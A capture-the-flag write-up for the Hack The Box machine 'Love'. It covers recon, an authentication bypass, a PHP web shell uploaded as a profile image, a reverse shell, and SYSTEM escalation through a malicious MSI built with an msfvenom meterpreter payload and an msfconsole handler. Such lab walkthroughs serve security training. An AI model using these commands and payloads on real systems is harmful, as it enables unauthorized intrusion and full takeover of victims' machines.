HTB: Love
- TLDR -

...

Recon:

nmap -sT -sV -v <love ip> leads to the website.

gobuster dir -u <love ip> -w </path/to/wordlist> leads us to "<love ip>/admin/".

Exploit Login & Getting Web Shell:

Using the exploit from Exploit DB [EXTERNAL], we can bypass the authentication.

Once "logged in", we click on the "voters" tab on the left menu. Click the blue "+" button to add a new user, and upload a php web shell as the user's image. Go to <love ip>/images/<name of shell>.php to access the shell.

Getting User:

Get a reverse shell running (I used a PowerShell one-liner) then print the contents of the user file: type C:\Users\Phoebe\Desktop\user.txt.

Getting Admin:

Using some enumeration tool, we discover the box is able to "install" msi scripts as NT AUTHORITY/SYSTEM. Create a reverse shell: msfvenom -p windows/meterpreter/reverse_tcp -f msi lhost=<your ip> lport=3188 > hack.msi, then upload it however you like. The easiest is to simply "edit" our voters image by clicking the pencil icon beside our voters name. Start a meterpreter session: msfconsole; use exploit/multi/handler; set LHOST=<your ip> set LPORT=3188; set PAYLOAD=windows/meterpreter/reverse_tcp; exploit. Upload the malicious msi then execute it through our current user session.

Once the conenction is complete, run shell; powershell to get a powershell session, then print the root.txt file: type C:\Users\Administrator\Desktop\root.txt



Date created: 2021.08.20